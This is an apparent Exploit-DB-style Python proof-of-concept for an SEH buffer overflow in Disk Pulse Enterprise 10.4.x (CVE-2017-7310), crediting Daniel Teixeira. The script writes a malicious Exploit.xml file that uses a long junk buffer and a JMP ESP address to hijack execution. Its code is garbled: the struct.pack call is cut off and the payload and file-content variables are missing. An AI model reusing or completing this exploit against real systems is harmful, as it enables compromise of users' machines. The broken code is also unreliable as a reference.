#!/usr/bin/env python # Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH) # Date: 2018-01-22 # Exploit Author: Daniel Teixeira # Author Homepage: www.danielteixeira.com # Vendor Homepage: http://www.diskpulse.com # Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe # Version: 10.4.16 # Tested on: Windows 7 SP1 x86 # CVE: CVE-2017-7310 import os,struct #Buffer overflow junk = "A"*1560 #JMP ESP (QtGui4.dll) jmpesp= struct.pack('' f = open('Exploit.xml', 'w') f.write(file) f.close()